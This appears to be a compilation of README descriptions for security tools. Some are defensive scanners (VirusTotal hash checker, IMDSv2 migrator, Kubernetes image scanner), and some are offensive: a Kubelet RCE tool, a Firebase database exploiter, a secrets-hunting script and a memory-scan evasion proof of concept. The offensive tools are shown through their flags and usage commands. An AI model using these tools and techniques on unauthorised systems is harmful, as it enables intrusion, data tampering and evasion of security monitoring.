Supported FILE_TYPES: dotnet, php, java, custom, allfiles
The tool generates reports in three formats: HTML, PDF, and TEXT. The HTML and PDF reports are still being improved but are already in a reasonably good state, and they will continue to be refined with each subsequent iteration.
Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.
Note: At present, the effort estimation for source code review is in its early stages and should be considered experimental. Since both the formula and the concept are new, they will be refined over multiple releases to achieve reasonable accuracy.
Currently, the effort estimation report is generated in HTML format; future releases plan to provide it in PDF format as well.
VTScanner is a versatile Python tool that empowers users to perform comprehensive file scans within a selected directory for malware detection and analysis. It seamlessly integrates with the VirusTotal API to deliver extensive insights into the safety of your files. VTScanner is compatible with Windows, macOS, and Linux, making it a valuable asset for security-conscious individuals and professionals alike.
VTScanner enables users to choose a specific directory for scanning. By doing so, you can assess all the files within that directory for potential malware threats.
Upon completing a scan, VTScanner generates detailed reports summarizing the results. These reports provide essential information about the scanned files, including their hash, file type, and detection status.
VTScanner leverages file hashes for efficient malware detection. By comparing the hash of each file to known malware signatures, it can quickly identify potential threats.
VTScanner interacts seamlessly with the VirusTotal API. If a file has not been scanned on VirusTotal previously, VTScanner automatically submits its hash for analysis. It then waits for the response, allowing you to access comprehensive VirusTotal reports.
For users with free VirusTotal accounts, VTScanner offers a time delay feature. This function introduces a specified delay (recommended between 20-25 seconds) between each scan request, ensuring compliance with VirusTotal's rate limits.
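Taken together, the hash lookup and the rate-limit delay boil down to a loop like the following minimal sketch. This is not VTScanner's actual code; the VT_API_KEY environment variable and the scanned directory are assumptions, while the v3 files endpoint and x-apikey header are VirusTotal's documented API:

import hashlib
import os
import time

import requests

API_KEY = os.environ["VT_API_KEY"]  # assumed: key supplied via environment
DELAY = 25  # seconds between requests, per the free-tier recommendation above

def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def lookup(path):
    file_hash = sha256_of(path)
    resp = requests.get(
        f"https://www.virustotal.com/api/v3/files/{file_hash}",
        headers={"x-apikey": API_KEY},
    )
    if resp.status_code == 404:
        return file_hash, "not yet known to VirusTotal"
    stats = resp.json()["data"]["attributes"]["last_analysis_stats"]
    return file_hash, f"flagged by {stats['malicious']} engines"

for name in os.listdir("."):  # assumed: scan the current directory
    if os.path.isfile(name):
        print(*lookup(name))
        time.sleep(DELAY)  # respect VirusTotal's free-tier rate limit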
If you have a premium VirusTotal API account, VTScanner provides the option for concurrent scanning. This feature allows you to optimize scanning speed, making it an ideal choice for more extensive file collections.
VTScanner goes the extra mile by enabling users to explore VirusTotal's detailed reports for any file with a simple double-click. This feature offers valuable insights into file detections and behavior.
For added convenience, VTScanner comes with prebuilt Windows binaries compiled using PyInstaller. Note that these binaries are currently detected by 10 antivirus scanners.
If you prefer to generate your own binaries or use VTScanner on non-Windows platforms, you can easily create custom binaries with PyInstaller.
Before installing VTScanner, make sure you have the following prerequisites in place:
pip install -r requirements.txt
You can acquire VTScanner by cloning the GitHub repository to your local machine:
git clone https://github.com/samhaxr/VTScanner.git
To initiate VTScanner, follow these steps:
cd VTScanner
python3 VTScanner.py
VTScanner is released under the GPL License. Refer to the LICENSE file for full licensing details.
VTScanner is a tool designed to enhance security by identifying potential malware threats. However, it's crucial to remember that no tool provides foolproof protection. Always exercise caution and employ additional security measures when handling files that may contain malicious content. For inquiries, issues, or feedback, please don't hesitate to open an issue on our GitHub repository. Thank you for choosing VTScanner v1.0.
AWS workloads that rely on the legacy metadata endpoint (IMDSv1) are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration of all workloads to IMDSv2, which implements enhanced security measures to protect against these attacks.
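To see why requiring IMDSv2 matters for SSRF, compare the two request flows below; this is an illustrative sketch (using the requests library, runnable only from an EC2 instance), not part of IMDShift:

import requests

IMDS = "http://169.254.169.254"  # link-local metadata endpoint on EC2

# IMDSv1: credentials are a single GET away, which is exactly the kind
# of request a typical SSRF primitive can forge.
v1 = requests.get(f"{IMDS}/latest/meta-data/iam/security-credentials/", timeout=2)

# IMDSv2: a session token must first be obtained via a PUT request with a
# custom header, and the token must accompany every read. Most SSRF
# primitives can neither send PUTs nor set arbitrary headers.
token = requests.put(
    f"{IMDS}/latest/api/token",
    headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"},
    timeout=2,
).text
v2 = requests.get(
    f"{IMDS}/latest/meta-data/iam/security-credentials/",
    headers={"X-aws-ec2-metadata-token": token},
    timeout=2,
)
print(v1.status_code, v2.status_code)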
IMDShift can also report IMDSv1 usage via the "MetadataNoToken" CloudWatch metric across specified regions.
Metabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.
IMDShift makes several improvements over Metabadger's capabilities:
To install IMDShift:
git clone https://github.com/ayushpriya10/imdshift.git
cd imdshift/
python3 -m pip install .
To install it in editable mode for development:
git clone https://github.com/ayushpriya10/imdshift.git
cd imdshift/
python3 -m pip install -e .
Options:
  --services TEXT             Specifies which services to scan for IMDSv1 usage,
                              from [EC2, Sagemaker, ASG (Auto Scaling Groups),
                              Lightsail, ECS, EKS, Beanstalk].
                              Format: "--services EC2,Sagemaker,ASG"
  --include-regions TEXT      Specifies regions to explicitly include in the scan
                              for IMDSv1 usage.
                              Format: "--include-regions ap-south-1,ap-southeast-1"
  --exclude-regions TEXT      Specifies regions to explicitly exclude from the scan.
                              Format: "--exclude-regions ap-south-1,ap-southeast-1"
  --migrate                   Boolean flag that makes IMDShift perform the
                              migration; defaults to "False". Format: "--migrate"
  --update-hop-limit INTEGER  Specifies whether the hop limit should be updated
                              and with what value. It is recommended to set the
                              hop limit to "2" so that containers can work with
                              the IMDS endpoint. If this flag is not passed, the
                              hop limit is not updated during migration.
                              Format: "--update-hop-limit 3"
  --enable-imds               Boolean flag that makes IMDShift enable the metadata
                              endpoint for resources that have it disabled and
                              then perform the migration; defaults to "False".
                              Format: "--enable-imds"
  --profile TEXT              Use any profile from your ~/.aws/credentials file.
                              Format: "--profile prod-env"
  --role-arn TEXT             Assume a role via AWS STS.
                              Format: "--role-arn arn:aws:sts::111111111:role/John"
  --print-scps                Boolean flag that prints Service Control Policies
                              (SCPs) that can be used to control IMDS usage, such
                              as denying access for credentials fetched from
                              IMDSv2 or denying creation of resources with IMDSv1;
                              defaults to "False". Format: "--print-scps"
  --check-imds-usage          Boolean flag that launches a scan to identify how
                              many instances used IMDSv1 in the specified regions
                              during the last 30 days, via the "MetadataNoToken"
                              CloudWatch metric; defaults to "False".
                              Format: "--check-imds-usage"
  --help                      Show this message and exit.
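For plain EC2 instances, the effect of "--migrate" combined with "--update-hop-limit" can be approximated with boto3, as in this hedged sketch (IMDShift itself covers more services; the region is only an example):

import boto3

ec2 = boto3.client("ec2", region_name="ap-south-1")  # example region

# Find instances that still accept IMDSv1 (HttpTokens == "optional")...
for reservation in ec2.describe_instances()["Reservations"]:
    for instance in reservation["Instances"]:
        if instance.get("MetadataOptions", {}).get("HttpTokens") == "optional":
            # ...and require IMDSv2 session tokens, raising the hop limit
            # to 2 so containers can still reach the IMDS endpoint.
            ec2.modify_instance_metadata_options(
                InstanceId=instance["InstanceId"],
                HttpTokens="required",
                HttpPutResponseHopLimit=2,
                HttpEndpoint="enabled",
            )
            print("migrated", instance["InstanceId"])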
Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. It was originally written to assist in rapidly searching through files obtained during a penetration test.
Gold Digger requires Python3.
virtualenv -p python3 .
source bin/activate
python dig.py --help
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]
optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output
Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder via the --directory flag.
An example structure could be:
~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/
You would provide the following command to parse all three directories:
python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log
The tool will create a log file containing the scanning results. Due to the nature of regular expressions, there may be numerous false positives; despite this, the tool has proven to increase productivity when processing thousands of files.
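At its core, the tool is a recursive walk plus regex matching. The sketch below shows that idea only; the gold.json and exclusions.json schemas used here (a list of regex strings and a list of extensions) are assumptions, not Gold Digger's documented formats:

import json
import os
import re

# Assumed schemas: gold.json holds a list of regex strings and
# exclusions.json holds a list of file extensions to skip.
patterns = [re.compile(p) for p in json.load(open("gold.json"))]
excluded = set(json.load(open("exclusions.json")))

for root, _dirs, files in os.walk("data/"):  # the --directory root folder
    for name in files:
        if os.path.splitext(name)[1] in excluded:
            continue  # skip excluded extensions
        path = os.path.join(root, name)
        try:
            with open(path, errors="ignore") as handle:
                text = handle.read()
        except OSError:
            continue
        for pattern in patterns:
            for match in pattern.finditer(text):
                print(f"{path}: {match.group(0)}")  # log the hit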
Shout out to @d1vious for releasing git-wild-hunt (https://github.com/d1vious/git-wild-hunt)! Most of the regexes in Gold Digger come from this amazing project.
A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).
The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.
Artemis is experimental software, under active development - use at your own risk.
For an up-to-date list of features, please refer to the documentation.
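Because Artemis modules are Karton services under the hood, a module follows Karton's consumer shape. The sketch below is a generic Karton consumer using karton.core's documented API; the identity, filter and payload key are made up, and Artemis's real module base class adds scanning helpers on top:

from karton.core import Karton, Task

class ExampleScanner(Karton):
    """Generic Karton consumer; not Artemis's actual module base class."""

    identity = "example-scanner"          # hypothetical service identity
    filters = [{"type": "example-task"}]  # consume only matching tasks

    def process(self, task: Task) -> None:
        target = task.get_payload("target")  # hypothetical payload key
        self.log.info("scanning %s", target)

if __name__ == "__main__":
    ExampleScanner().loop()  # connect to the Karton backend and consume tasks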
To run the tests, use:
./scripts/test
Artemis uses pre-commit to run linters and format the code; pre-commit is executed on CI to verify that the code is formatted properly.
To run it locally, use:
pre-commit run --all-files
To set up pre-commit so that it runs before each commit, use:
pre-commit install
To build the documentation, use:
cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html
Please refer to the documentation.
Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.
However obvious it may seem, we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.
Serial No. | Tool Name | Serial No. | Tool Name
---|---|---|---
1 | whatweb | 2 | nmap
3 | golismero | 4 | host
5 | wget | 6 | uniscan
7 | wafw00f | 8 | dirb
9 | davtest | 10 | theharvester
11 | xsser | 12 | fierce
13 | dnswalk | 14 | dnsrecon
15 | dnsenum | 16 | dnsmap
17 | dmitry | 18 | nikto
19 | whois | 20 | lbd
21 | wapiti | 22 | devtest
23 | sslyze | |
Critical: Vulnerabilities that score in the critical range usually have most of the following characteristics: exploitation likely results in root-level compromise of servers or infrastructure devices, and exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user (for example via social engineering) into performing any special functions.
High: An attacker can fully compromise the confidentiality, integrity or availability of a target system without specialized access, user interaction or circumstances that are beyond the attacker's control. Exploitation is very likely to allow lateral movement and escalation of the attack to other systems on the internal network of the vulnerable application. The vulnerability may be difficult to exploit, but exploitation could result in elevated privileges, significant data loss or downtime.
Medium: An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control may be required for an attack to succeed. The vulnerability is very likely to be used in conjunction with other vulnerabilities to escalate an attack. This range also covers vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics, denial-of-service vulnerabilities that are difficult to set up, exploits that require the attacker to reside on the same local network as the victim, vulnerabilities where exploitation provides only very limited access, and vulnerabilities that require user privileges for successful exploitation.
Low: An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker's control are required for an attack to succeed, and the vulnerability needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info: An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information an attacker obtains might be used to craft a more accurate attack at a later date. It is recommended to restrict any information disclosure as far as possible.
CVSS v3 Score Range | Severity in Advisory
---|---
0.1 - 3.9 | Low
4.0 - 6.9 | Medium
7.0 - 8.9 | High
9.0 - 10.0 | Critical
Run the program as: python3 web_scan.py https://example.com (http or https)
--help
--update
Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan | |
---|---|---|---|---|
1 | IPv6 | 2 | Wordpress | |
3 | SiteMap/Robot.txt | 4 | Firewall | |
5 | Slowloris Denial of Service | 6 | HEARTBLEED | |
7 | POODLE | 8 | OpenSSL CCS Injection | |
9 | FREAK | 10 | Firewall | |
11 | LOGJAM | 12 | FTP Service | |
13 | STUXNET | 14 | Telnet Service | |
15 | LOG4j | 16 | Stress Tests | |
17 | WebDAV | 18 | LFI, RFI or RCE. | |
19 | XSS, SQLi, BSQL | 20 | XSS Header not present | |
21 | Shellshock Bug | 22 | Leaks Internal IP | |
23 | HTTP PUT DEL Methods | 24 | MS10-070 | |
25 | Outdated | 26 | CGI Directories | |
27 | Interesting Files | 28 | Injectable Paths | |
29 | Subdomains | 30 | MS-SQL DB Service | |
31 | ORACLE DB Service | 32 | MySQL DB Service | |
33 | RDP Server over UDP and TCP | 34 | SNMP Service | |
35 | Elmah | 36 | SMB Ports over TCP and UDP | |
37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Template contributions, feature requests and bug reports are more than welcome.
Feel free to check the issues page.
Kubestroyer is a Golang exploitation tool that aims to take advantage of Kubernetes cluster misconfigurations and to be the Swiss Army knife of your Kubernetes pentests.
The tool scans known Kubernetes ports that may be exposed, and exploits them.
To get a local copy up and running, follow these simple example steps.
wget https://go.dev/dl/go1.19.4.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.19.4.linux-amd64.tar.gz
Use a prebuilt binary, or install with the go install command:
$ go install github.com/Rolix44/Kubestroyer@latest
or build from source:
$ git clone https://github.com/Rolix44/Kubestroyer.git
$ go build -o Kubestroyer cmd/kubestroyer/main.go
Parameter | Description | Mandatory/Optional | Example
---|---|---|---
-t / --target | Target (IP, domain or file) | Mandatory | -t localhost,127.0.0.1 / -t ./domain.txt
--node-scan | Enable node port scanning (ports 30000 to 32767) | Optional | -t localhost --node-scan
--anon-rce | RCE using Kubelet API anonymous auth | Optional | -t localhost --anon-rce
-x | Command to execute when using RCE (displays service account token by default) | Optional | -t localhost --anon-rce -x "ls -al"
Roadmap areas:
- Target
- Scanning
- Vulnerabilities
See the open issues for a full list of proposed features (and known issues).
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
1. Create your feature branch: git checkout -b feature/AmazingFeature
2. Commit your changes: git commit -m 'Add some AmazingFeature'
3. Push to the branch: git push origin feature/AmazingFeature
Distributed under the MIT License. See LICENSE.txt for more information.
Rolix - @Rolix_cy - rolixcy@protonmail.com
Project Link: https://github.com/Rolix44/Kubestroyer
A Burp Suite extension that allows for recursive crawling and scanning of Single Page Applications.
It runs a Chromium browser to scan the webpage for DOM-based XSS.
It can also collect all the requests (XHR, fetch, websockets, etc) issued during the crawling allowing them to be forwarded to Burp's Proxy, Repeater and Intruder.
It requires node and DOMDig. The latest release can be downloaded here.
Set the path of node's executable and the path of domdig.js in the extension's UI.
Burp DOM Scanner uses DOMDig as its crawling and scanning engine.
DOMDig is a DOM XSS scanner that runs inside the Chromium web browser and can scan single page applications (SPAs) recursively. Unlike other scanners, DOMDig can crawl any web application (including Gmail) by keeping track of DOM modifications and XHR/fetch/websocket requests, and it can simulate real user interaction by firing events. During this process, XSS payloads are put into input fields and their execution is tracked in order to find injection points and the related URL modifications.
Details about usage, performed checks and reported vulnerabilities can be found at DOMDig's page.
This tool is a simple PoC of how to hide memory artifacts using a ROP chain in combination with hardware breakpoints. The ROP chain changes the main module's memory page protections to no-access (N/A) while sleeping (i.e. when the Sleep function is called). For more detailed information about this memory-scanning evasion technique, check out the original Gargoyle project. x64 only.
The idea is to set a hardware breakpoint on kernel32!Sleep and register a new top-level exception filter to handle the exception. When Sleep is called, the previously registered filter function is triggered, allowing us to call the ROP chain without using classic function hooks. This way, we avoid leaving weird and unusual private memory regions in the process related to well-known DLLs.
The ROP chain simply calls VirtualProtect() to set the current memory page to N/A, then calls SleepEx and finally restores the RX memory protection.
The overview of the process is as follows:
This process repeats indefinitely.
As it can be seen in the image, the main module's memory protection is changed to N/A while sleeping, which avoids memory scans looking for pages with execution permission.
Since the LITCRYPT plugin is used to obfuscate string literals, the environment variable LITCRYPT_ENCRYPT_KEY must be set before compiling the code:
C:\Users\User\Desktop\RustChain> set LITCRYPT_ENCRYPT_KEY="yoursupersecretkey"
After that, simply compile the code and run the tool:
C:\Users\User\Desktop\RustChain> cargo build
C:\Users\User\Desktop\RustChain\target\debug> rustchain.exe
This tool is just a PoC, and some extra features would need to be implemented for it to be fully functional. The main purpose of the project was to learn how to implement a ROP chain and integrate it within Rust. As a result, the tool will only work if used as-is; failures are expected if you try to use it in other ways (for example, compiling it to a DLL and trying to reflectively load and execute it).
- Verify that your kubeconfig (~/.kube/config) is properly configured for the target cluster.
- deploy/kubei.yaml is used to deploy and configure Kubei on your cluster.
- Set the IGNORE_NAMESPACES env variable to ignore specific namespaces. Set TARGET_NAMESPACE to scan a specific namespace, or leave it empty to scan all namespaces.
- Set the MAX_PARALLELISM env variable for the maximum number of simultaneous scanners.
- Set the SEVERITY_THRESHOLD env variable; only vulnerabilities at or above this threshold will be reported. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Medium.
- Set the DELETE_JOB_POLICY env variable to define whether or not to delete completed scanner jobs. Supported values are: All (all jobs will be deleted), Successful (only successful jobs will be deleted; default), Never (jobs will never be deleted).
kubectl apply -f https://raw.githubusercontent.com/Portshift/kubei/master/deploy/kubei.yaml
kubectl -n kubei get pod -lapp=kubei
kubectl -n kubei port-forward $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}') 8080
kubectl -n kubei logs $(kubectl -n kubei get pods -lapp=kubei -o jsonpath='{.items[0].metadata.name}')
To change Kubei's configuration, modify and re-apply deploy/kubei.yaml.
FirebaseExploiter accepts, among other arguments, an exploit.json file to upload during exploitation and a custom URI path for the exploit. Running the tool with its help flag will display help for the CLI tool, listing all the required arguments it supports.
FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go to install it successfully. Run the following command to install the latest version:
go install -v github.com/securebinary/firebaseExploiter@latest
To scan a specific domain to check for Insecure Firebase DB.
To exploit a Firebase DB to write your own JSON document in it.
Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.
Checking the exploited URL to verify the vulnerability.
Adding a custom path for exploiting Firebase DBs.
Mass scanning for Insecure Firebase Databases from list of target hosts.
Exploiting vulnerable Firebase DBs from the list of target hosts.
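Behind these checks is a simple HTTP probe: a misconfigured Firebase Realtime Database answers unauthenticated REST calls under /.json. The sketch below illustrates the read and write checks; the target domain is hypothetical, and such probes should only be run against databases you are authorized to test:

import json

import requests

db = "https://example-project.firebaseio.com"  # hypothetical target

# Read check: an open database returns data (or null) instead of
# {"error": "Permission denied"}.
read = requests.get(f"{db}/.json")
print("readable" if read.ok else "read denied", read.text[:80])

# Write check: insecure rules also accept unauthenticated writes,
# such as uploading your own exploit.json document.
payload = json.load(open("exploit.json"))
write = requests.put(f"{db}/poc.json", json=payload)
print("write succeeded" if write.ok else "write denied")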
FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contributions are welcome.